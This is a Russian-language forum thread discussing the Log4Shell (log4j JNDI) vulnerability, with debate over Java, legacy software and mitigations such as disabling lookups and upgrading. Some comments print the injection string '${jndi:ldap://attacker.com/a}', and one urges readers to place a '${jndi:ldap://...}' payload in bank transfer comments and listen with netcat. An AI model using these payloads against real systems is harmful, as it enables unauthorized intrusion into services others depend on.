|
2.20, Аноним (20), 10:06, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +6 +/– |
Не так давно пол-США сидели без бензина и мяса когда ломанули оператора трубопроводной сети и оператора сети мясокомбинатов. А на яве написано допупа бизнес-логики.
| |
2.46, Аноним (-), 11:10, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
Для того чтобы понять почему катастрофическая запусти у себя netcat на порту 389, отправь на карту или счёт в другом банке любой перевод с ${jndi:ldap://твой_IP/test} в комментарии и насладись сколько вего разного к тебе полезет :-)
| |
|
|
4.68, Аноним (68), 12:28, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +2 +/– |
И как вы online-банком если всё закрыто пользуйтесь? Только не говорите, что там исходящие соединения блокируются, это у единиц.
| |
|
|
|
|
2.9, btrfs (?), 09:43, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +6 +/– |
Простите за моё невежество, но как связаны реализация в языке и нечто криво реализованное на этом языке?
| |
|
3.11, Аноним (11), 09:49, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +30 +/– |
Есть свидетели того, которые утверждают, что если убрать риски работы с памятью, то всё само наладится, и даже кости выпрямятся.
| |
|
4.39, Аноним (39), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
Простите, но Вы звиздите. Никто из них не утверждал, что прям "всё само наладится". Исчезнут (почти) целые классы ошибок, коих большинство (70-80%), но логические ошибки в архитектуре системы или в реализации бизнес-логики никто не отменял - от прокладки зависит. Но Вы, конечно, припИшете оппонентам и поедание младенцев, хуже не будет, верно?
| |
|
3.69, Michael Shigorin (ok), 12:30, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| –3 +/– |
> как связаны реализация в языке и нечто криво реализованное на этом языке?
Надежда на серебрянопульность инструмента склонна отключать рассудок с весьма печальными последствиями. Варианты могут быть самыми разными -- от "возьмём язык с автоматическим управлением памятью" до "попрыгаем на площади и покричим" или классического "построим соломенный самолёт", что характерно.
| |
|
4.114, ыы (?), 16:40, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
Любите вы Миша обобщать, и делать выводы космического масштаба.. а сами все лето в свитере проходили...
| |
|
|
2.92, Аноним (84), 13:31, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +10 +/– |
Раньше надо было срывать стек, писать шелл-код на ассемблере, не ошибиться с адресами на удалённой машине. А теперь процесс-жертва услужливо подтянет Java байт-код атакующего прямо из Интернета и аккуратно вставит в себя, не нарушив целостность стека и процесса, автоматически проинициализирует твой код, будет за ним мусор собирать. Красота! :)
| |
|
3.171, Аноним (171), 22:20, 13/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
А ведь скоро придет время, когда они додумаются прикрутить продвинутый искусственный интеллект к очередной помойке для логов, и тогда пелевинские "зенитные кодексы" из фантастики превратяться в когнитивно диссонирующую реальность.
Истинно говорю вам! Так что покайтесь, пока еще не поздно...
| |
|
|
1.8, лютый жабби__ (?), 09:43, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]
| –3 +/– |
бред какой-то... даже если торчит майнкрафт голой ж в инет, ну запишите в логгер произвольный текст, я посмотрю на ваши успехи )
"Надо срочно переписать на ржаву"
твои мозги )
| |
|
|
3.19, лютый жабби__ (?), 10:04, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +/– |
>При чем там лютый legacy
ты неправ. слышал, что у немцев можно 6-ку встретить, но в рф 8-11 уже почти везде. у всяких тупкофф-кредитно-пельменные-системы 17 + коклины, скалы, го и прочая смузибень ) уж версию log4j бампнуть не проблема.... хотя для типичного
e.printStackTrace();
данная "уязвимость" имхо неуязвима
| |
|
4.37, Онаним (?), 10:43, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +7 +/– |
Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО(tm). И бампнуть там ничего не получится либо потому что все версии библиотек тоже прибиты гвоздями по сертификации, либо потому, что API сменилось 100500 лет назад тому, и говно мамонта просто развалится.
| |
|
5.77, лютый жабби__ (?), 12:59, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –3 +/– |
>Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО
в УдмуртСельхозБанке разве только... )
| |
|
|
|
|
|
|
|
4.56, aa (?), 11:43, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +3 +/– |
учитывая что любой объект в джаве - это указатель, то в джаве указатели не просто можно , а прям необходимо.
вот арифметики указателей нету, поэтому обратиться куда-то по левому адресу сложно.
| |
|
5.129, barracuda92 (ok), 21:49, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
у нас индусы написали автотесты в которых была статичная мапа в который все контексты валялись, все хедлесс браузеры, всё-всё в общем, при выделении 8 гб на тесты они падали с аут оф мемори))
| |
|
6.140, лютый жабби__ (?), 11:49, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
>при выделении 8 гб на тесты они падали с аут оф мемори
дедики с 64ГБ стоят 3 тыра в месяц. я б не работал в такой помойке, где раму жмотят )
а вчерашний студент после курсов стоит 150+ тыр (плюсом налоги)
| |
|
|
4.167, Наме (?), 11:45, 13/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +/– |
Жаба саморефлексаная и полностью динамическая. Так что, можно, в общем-то, всё. Правда, пальцы сотрутся и глаза коростой покроются.
| |
|
|
2.32, Котофалк (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +1 +/– |
Скилл написать небезопасно на каком угодно языке позволяет это преодолеть. И не только это. Тут как нельзя кстати набор поговорок про сломать сдуру, про стеклянный до обеда и иже с ними.
| |
2.45, Аноним (39), 11:01, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +1 +/– |
Ну возьми самый безопасный язык (у тебя, как я смею предположить, основываясь на твоем творчество на опеннете, это сиплюсплюс со всякими модными (условно) "умными указателями" и правильными техниками написания кода настоящими программистами?) и напиши на нем безусловную загрузку извне любой произвольной блобятины и ее последующий запуск и потом ори - "язык небезопасный, мне вирусятину тиснул!". А если каким-то чудом язык мог бы запретить такое делать, орал бы "что за 1С мне навязывают, на этом гогне ничего нетривиального нельзя сделать!"
| |
|
3.121, n00by (ok), 17:22, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
> Ну возьми ...
> и напиши на нем безусловную загрузку извне любой произвольной блобятины
> ее последующий запуск
Изучите тему и не пишите подобное. Задача не решается в общем виде.
| |
|
|
|
2.133, Аноним (133), 22:32, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
Есть мнение, что для отдельно взятой задачи сложность постоянна. Вопрос лишь в том, где она сконцентирирована - в твоём коде или в сторонних компонентах.
| |
|
1.17, Аноним12345 (?), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]
| +1 +/– |
>> Возвращённый сервером атакующего путь будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
Это действительно катастрофа
С системой можно делать все что угодно
Жаба, господа, та самая проприетарная жаба
| |
|
2.125, Bogdan (??), 18:29, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
Она как бы опенсорс, господин. Ну и причем тут язык и платформа, если дело в либе, уже давно log4j - это легаси, то что некоторым лень уменьшит тех. долг - не проблема платформы
| |
|
|
2.126, Bogdan (??), 18:31, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
Где вы такое последний раз видели ? И звучит странно "Что бы пкередать стрингу...." - в коком это контексте ? Куда передать ? RPC - это как бы не java-вая фигня
| |
|
1.24, Аноним (24), 10:11, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]
| +4 +/– |
Jndi для лога это точно нужная фича которая должна быть включена у всех по умолчанию? Может быть нафиг её?
И вообще сетевые запросы отправлять в логе не выглядит безопасно.
| |
|
2.44, Онаним (?), 10:57, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +8 +/– |
Бездумный eval (а это по сути своей eval) в генерируемом обычно с использованием пользовательского ввода логе - это особый уровень пох**зма, который, надо сказать, очень сложно будет переплюнуть.
| |
|
3.59, aa (?), 11:52, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
Выполнять логи - это конечно крипота та еще, но, я так понимаю, это ради производительности - если передавать уже готовое значение в логи, то его надо обязательно вычислить перед этим (а значит обратиться к этому лдапу, что-то передать, потом распарсить ответ итд), а логгер после этого может просто выбросить это значение, потому что уровень логгирования не тот.
| |
|
|
5.146, а (?), 15:26, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
если всё руками делать, то можно и на С писать.
а тут можно просто сказать логгеру - "если что запиши значение вон оттудава", ничего не проверяя и не вычисляя
Л - удобство
| |
|
4.158, Аноним (158), 05:21, 13/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +/– |
При необходимости передавать в логгер помимо строки раннер для нужных запросов (попросту колбэк), который максимум вернёт мап с параметрами, которые нужно в плейсхолдеры подставить. Тогда логгер сможет сам решить — нужно ему этот раннер дёргать или нет.
| |
|
|
|
1.29, пох. (?), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [к модератору]
| +2 +/– |
Кстати,поищите у себя в логах appdynamics. Эксплуатируемо или нет - не знаю, но им пользуется половина так называемого цивилизованного мира. Да, оно работает от рута.
Да, конечно же там log4j, где ж его теперь нет.
| |
1.30, Аноним (30), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [к модератору]
| +/– |
У меня вчера stream play на стиме сам без особой причины запустился. И начал двигать мышью и открыл виртуальную клаву Steam. у меня есть основания полагать что уже активно юзают это чудо.
| |
1.35, Онаним (?), 10:40, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [к модератору]
| +4 +/– |
> "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу
Макаки конечно везде одинаковые, да...
Это ж надо такую срань в систему логгирования воткнуть.
А вот просто ${var} и передачу var отдельно - ну никак было.
| |
1.40, Аноним (-), 10:49, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]
| +/– |
По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. Лично перепроверить не решился, так как за такую проверку и посадить могут.
| |
|
2.47, пох. (?), 11:15, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +2 +/– |
> По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков.
appdynamics, да.
Страховые из первой десятки туда же.
> Лично перепроверить не решился, так как за такую проверку и посадить могут.
так ты американские "проверяй". Там апдырявикс такой же точно стоит. И в банках, и в страховых, и вообще в любых околофинансовых пира...ой, организациях.
Что ты с таким умением и талантом забыл на г0вуслугах?
| |
|
|
2.49, пох. (?), 11:16, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +3 +/– |
> Типа безопасные языки. Надо было писать на Rust :)
как, в нем нет eval?! Нельзя загрузить в процесс какой-нибудь неожиданный код из интересного источника? А если unsafe{} вокруг написать?
| |
|
3.82, morphe (?), 13:16, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат)
Да и не выйдет там так просто подобное сделать, инфраструктура форматирования там встроена в язык, а не реализуется всеми подряд, + для всяких сущностей есть вещи удобнее чем коды форматирования
| |
|
4.87, пох. (?), 13:21, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +2 +/– |
> eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат)
тысячигласс проверял, зуб дает? А то большинство из нас полагаю о такой нужной и полезной фиче в log4j тоже до сегодняшнего дня имели щастье не знать.
> Да и не выйдет там так просто подобное сделать, инфраструктура форматирования там
> встроена в язык, а не реализуется всеми подряд, + для всяких
так там все правильно форматируется, встроенными в язык средствами. Правильная получается строка для правильного обращения к ldap, не какой-нибудь вам off by one error или обращение в левую память. Кто бы мог подумать да и было ли ему чем, что в логах могут попадаться абсолютно любые строки?
| |
|
|
6.101, пох. (?), 15:09, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +/– |
весь прикол в том что оно вовсе не "userid" получало.
Оно получало КОД который исполняясь возвращал возможно вовсе не userid а результат общения в чате с этим пользователем техподдержки, ну, например. Ну почему бы и нет.
Если бы оно получало статические данные из ldap - никому бы никакого вреда от этого не было. В лог, недоступный извне, можно записать какие-то данные - доступные извне. Ну и что.
Как именно в хрусте можно вызвать КОД по ссылке на блок данных полученных хз откуда - это к знатокам хруста.
| |
|
5.164, Наме (?), 11:10, 13/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +/– |
Нефига не правильно. В ответ на JNDI-запрос исполняющий код не должен грузить классы. Это уж совсем трэшак. Очередное пюре в духе "а ведь было бы не плохо, чтобы кофеварка ещё и траву косила".
| |
|
|
|
2.50, Аноним (39), 11:26, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +1 +/– |
Ага, язык, на котором ты напишешь систему управления атомным реактором, должен будет бить тебя по рукам, когда ты в неправильной последовательности кнопки в программе будешь нажимать. А также язык, а не математик/архитектор/программист, посредством заложенных алгоритмов, должен будет следить чтобы в космической ракете ориентация правильно вычислялась. Ну и язык конечно же, а не проектировщик системы при создании, должен следить, чтобы в будущем "умном" доильном аппарате корове сиську не оторвало. Как же вы, мелкие моськи, недалёки...
| |
|
|
4.103, Аноним (39), 15:12, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +/– |
> Конечно, язык!
Пох, как всегда, передергиваешь. Язык не должен знать в какой последовательности у коровы соски дергать, в компиляторе или рантайме не должно быть абстракций про коровье вымя, они должны быть только в голове у проектировщика. То же и про самописную (по отношению к языку) систему логгирования. Мог бы быть наполовину прав, если бы эта система была частью языкового рантайма/системной библиотеки.
| |
|
5.105, пох. (?), 15:16, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –2 +/– |
>> Конечно, язык!
> Пох, как всегда, передергиваешь. Язык не должен знать в какой последовательности у
> коровы соски дергать, в компиляторе или рантайме не должно быть абстракций
> про коровье вымя, они должны быть только в голове у
> проектировщика. То же и про самописную (по отношению к языку) систему
> логгирования. Мог бы быть наполовину прав, если бы эта система была
> частью языкового рантайма/системной библиотеки.
да-да, во всем виноват, помнити его - автор leftpad. Взял и сломал нам весь интернет. А не угребищный язык на котором логгер (или выравнивание пробелом) надо разрабатывать силами апач фаундейшн десять лет, иначе хрен запишешь строку в файл.
| |
|
6.149, Онаним (?), 19:42, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
Да тут не в языке дело.
Тут чтобы палку-копалку выстругать - изобрели бензопилу, и попытались с её помощью палку заточить.
| |
6.150, Онаним (?), 19:42, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
Это где-то около надувания щёк - посмотрите, как мы можем.
Не зря же есть хорошая фраза из математической старины: "упрощать - сложнее всего".
| |
|
|
4.143, john_erohin (?), 13:10, 11/12/2021 [^] [^^] [^^^] [ответить] [↓] [↑] [к модератору]
| +/– |
> все, абсолютно все приходилось изобретать с нуля
да ладно. это фон Браун с камрадами изобретали с нуля.
потом они в качестве трофеев достались. кому-то сам фон Браун,
а кому-то его камрады. железо и документы 50/50.
| |
|
5.144, пох. (?), 13:32, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
> да ладно. это фон Браун с камрадами изобретали с нуля.
ну так камрады и изобретали. Тов.Королев и другие ответственные товарищи - руководил.
Такого чтоб на старте рвануть даже еще до старта - себе не позволяли, инциденты на стендах и то были единичны и красной вехой в истори...в задницу впороты. Времена суровые были, партайгеноссе могли и в лагерь отправить, не умеешь проектировать с первого раза правильно - будешь напильником точить что другие напроектируют, а товарищи так и вовсе шлепнуть германского шпиена всегда готовы.
Ну и ресурсы надрывающейся промышленности берегли, конечно. А камрадов всегда можно новых нарожать.
| |
|
4.151, Михрютка (ok), 00:24, 12/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +/– |
будет врать-то.
союз на старте взрывался. протон на старте взрывался раз пять, не меньше.
как взрывалось на старте изделие 11А52, так это вообще словами не передать. Мишин после этого, говорят, год от Бармина прятался, тот ему пообещал за разнесенный фклочья стартовый комплекс морду набить.
янгелевские ракеты на испытаниях и на старте горели и в шахты падали.
>>>никто на самом деле не предвидел <...> такую безобразную аварию
не "не предвидел", а вывезли на старт недоработанную ракету. успеть к празднику торопились. "Результат немного предсказуем"
| |
|
5.153, n00by (ok), 12:38, 12/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
> не "не предвидел", а вывезли на старт недоработанную ракету. успеть к празднику
> торопились. "Результат немного предсказуем"
Приплетаю тот самый Линдукс. Тоже ведь торопились к праздничку. Интересно, где оно бабахнет?
| |
|
|
7.170, пох. (?), 17:39, 13/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
Я знаком по пересказам людей, работавших в отрасли.
А вот у тебя очень похоже на напевы рабиновича, даже близко не бывавшего.
| |
|
|
|
|
|
4.107, Аноним (39), 15:17, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
> Успагойся, то был просто растотроллинг.
Ну неприятно испытывать испанский стыд из-за таких петросянов. Типа шутка-троллинг, правда ее регулярно рассказывают далеко не первый год. Должно надесть жрать одно и то же.
| |
|
|
|
|
2.52, Онаним (?), 11:36, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +4 +/– |
Это не уязвимость, и не бэкдор. Это макакинг. А чо. Эвал прямо в логе - круто же, смотрите как мы можем, удобно, трендово, смузи, вейп...
| |
|
|
2.64, Аноним (64), 12:13, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +/– |
Надежно можно получать неофициальную информацию от кого угодно. Да там таких уязвимостей на много лет припасено.
| |
|
|
2.67, Аноним (67), 12:25, 10/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| +1 +/– |
У нас в рекомендациях от архитектуры всё ровно наоброт, мол slf4j и logback уже давно мёртвые, а log4j2 ещё и лучше оптимизирован и вообще allocation-free. Хотя я когда то попал в дебри исходников log4j2 - опплевался.
| |
|
|
4.106, пох. (?), 15:16, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
> он log4j 1х, это да, 10 лет из танка не вылезал
ты уверен что во второй версии нет той же самой фичи? Не может быть! Должны были добавить, а не убавить.
| |
|
5.113, ELF (ok), 16:38, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а первую не рекомендуют использовать уж 10 лет, кстати новость была - Катастрофическая уязвимость в Apache log4j, из нее как-будто это про log4j 1.х , теперь желтуху убрали и с версией определились.
| |
|
6.145, пох. (?), 13:36, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
> речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а
а, ну вот, теперь мир снова перевернут в нормальное положение.
В первой может и правда такой фичи еще не додумались - не рекомендую ее использовать, скучная она какая-то, не может внезапно с чужого ldap что-нить этакое исполнить.
| |
|
|
|
|
2.86, morphe (?), 13:21, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +1 +/– |
Много где slf4j стоит с log4j бекендом, из-за того что много существующих либ работают через log4j
Ну и наоборот бывает, log4j направленный в slf4j
| |
|
1.70, Аноним (70), 12:34, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]
| +1 +/– |
там чтобы уязвимость работали макака должна пользовательскую строку не как параметр добавить а явно приконкатинировать в сообщение с масками.
То есть джава-макаки не знают как работать с printf
| |
|
2.83, morphe (?), 13:18, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
Неа, оно раскрывается уже после подстановки параметров в строку форматирования
Т.е .error("{}", userInput) тоже уязвим
| |
|
1.72, Аноним (72), 12:36, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]
| +1 +/– |
Самое время задействовать умение настройки firewall.
Блокируем исходящие соединения на порт 389. При необходимости, впереди добавляем разрешающее правило с указанием нужных IP.
| |
|
2.81, пох. (?), 13:11, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
> Самое время задействовать умение настройки firewall.
> Блокируем исходящие соединения на порт 389.
ой, вендовая сеть легла. Кнутователь уже бежит в твою сторону.
Не, я не советую выяснять нужные адреса уже после добавления шибкоумной настройки. Могут успеть добежать с кнутом.
P.S. нет, периметр это хорошо и полезно, но вот беда - в любой большой сети всегда можно найти где-нибудь в дальнем-темном углу еще что-то уязвимое, что само по себе было бы безопасным поскольку никуда доступов не имеет и ничего ценного не содержит. Но на него может зайти сервер. И поскольку оба внутри периметра...
| |
|
3.104, пох. (?), 15:13, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
> В url можно свой порт передать, никто не заставляет сервер с ldap
> держать не на стандартном порту
ffuck... и что, эта тварь туда и полезет? (я почти уверен что таки да, к*к*к*кодереюзе жеж, зачем нам как-то по особому парсить урл для лдапа. Ну и у кого с внутренних серверов конторы наглухо перекрыт 80й?)
| |
|
|
1.80, Аноним (80), 13:06, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]
| +2 +/– |
Причём тут java впринципе? Мамкины кодеры любят использовать тонны third-party фреймворков. Да, не спорю что так код писать быстрее но если нужно надежнее - не используй 3rd party если можешь обойтись, особенно для критически уязвимой инфраструктуры.
| |
|
|
3.127, Онаним (?), 21:04, 10/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +/– |
Не надо переизобретать логгер.
Достаточно один раз его написать, и каждый хеллоуворлд сможет его юзать.
Но это будет не third-party код, в который нечаянно eval левые васяны уже не добавят.
| |
|
2.128, Онаним (?), 21:05, 10/12/2021 [^] [^^] [^^^] [ответить] [↑] [к модератору]
| +1 +/– |
Абсолютно да. Third party только по абсолютной необходимости, всегда *хотя бы* с визуальным аудитом, без автообновления.
| |
|
1.132, hohoho (?), 21:59, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [к модератору]
| +/– |
В статье не упоминается что уязвимость в PatternLayout. Если вы используете другой лэйоут, например jsonовский EcsLayout, то бэкдор не работает.
| |
1.134, Аноним (134), 22:46, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]
| +/– |
Вспоминается та недавняя уявзимость в imagemagick. Тоже ходило в интернет куда скажут.
Почему в мануалах ещё в отдельном разделе выделенном большими красными буквами не предупреждают, что программа/библиотека будет сама лазать куда-то в интернет в таких-то и таких-то случаях?
| |
|
2.136, Аноним (136), 03:33, 11/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
По хорошему такого поведения без лишних телодвижений быть не должно и предупреждать тогда ни о чем не нужно. Безопасное поведение по умолчанию. В этом плане авторы log4j подложили свинью пользователям библиотеки.
| |
|
1.135, Аноним (-), 23:07, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]
| –1 +/– |
На жабе не пишу, но недавно приходилось прикручивать кое-какие поделки через JNI. С этого log4 плевался особенно долго. Где-то читал, что жабу ждет судьба кобола. Легаси сектор и хорошая зарплата кому уже пох и пенсия скоро.
| |
|
2.138, пох. (?), 09:04, 11/12/2021 [^] [^^] [^^^] [ответить] [↓] [к модератору]
| –1 +/– |
Не читай ту глупую мурзилку больше.
Жабу ждет судьба кобола возведенного в факториал. Т.е. хороших зарплат будет больше чем способных их получить, поскольку разбираться в нагромождениях чужого кода это тебе не гуанокодить с нуля абы что, поэтому нанимать будут И тех кому пох и пенсия, и кто только что открыл учебник, и кто даже не открывал но нассал манагеру в уши. И всех на хорошую зарплату. И смогут морщить морду что смузи в этой лавке по утрам подают клубничный, а им нравится банановый, немедленно увольняюсь. Но их понадобятся миллионы, а не тысяча.
Учи жабу, сынок, учи - это беспроигрышно. Вооон сколько сейчас полезут пересобирать прожекты от которых ни доков ни понимания не осталось, но торчат наружу и используют нескучный log4j2
| |
|
3.156, Аноним (-), 03:14, 13/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +1 +/– |
Вот уж действительно все плохо там у вас.
Не, снова учить всякую каку это уж слишком. Я ее только недавно забыл.
| |
|
|
3.152, _ (??), 03:45, 12/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| +2 +/– |
В России? Конечно не платят, откуда в ней софт на Коблое?!?!
В США к примеру - платят, их Java Senior Developerы завидуют аж до позеленения и квакаютЪ :)
Но всё имеет начало и конец - в облаках мэйнфреймов нет, сказка идёт к развязке.
| |
|
4.159, пох. (?), 08:28, 13/12/2021 [^] [^^] [^^^] [ответить] [к модератору]
| –1 +/– |
> В России? Конечно не платят, откуда в ней софт на Коблое?!?!
> В США к примеру - платят, их Java Senior Developerы завидуют аж
> до позеленения и квакаютЪ :)
> Но всё имеет начало и конец - в облаках мэйнфреймов нет, сказка
> идёт к развязке.
будут эмулировать. Квалификация исчезает быстрее мэйнфреймов, поэтому переписать то от чего на самом деле зависят деньги - никто не возьмется. Те программисты-на-коболе - тем более не возьмутся, даже если бы могли именно переписать, а не по мелочи править тридцатилетний код, у них нет желания героически сделать мир чуточку хуже.
| |
|
|
|
1.169, shricke (??), 17:37, 13/12/2021 [ответить] [﹢﹢﹢] [ · · · ] [к модератору]
| +1 +/– |
В теории, если в java security настроено разрешение загрузки классов только из разрешенных папок, то exploit не должен сработать.
Теперь как это можно пофиксить:
1) Без обновления библиотеки:
Отключить через параметр с перезапуском jvm: -Dlog4j2.formatMsgNoLookups=true
2) Обновить log4j на версию 2.15
| |
|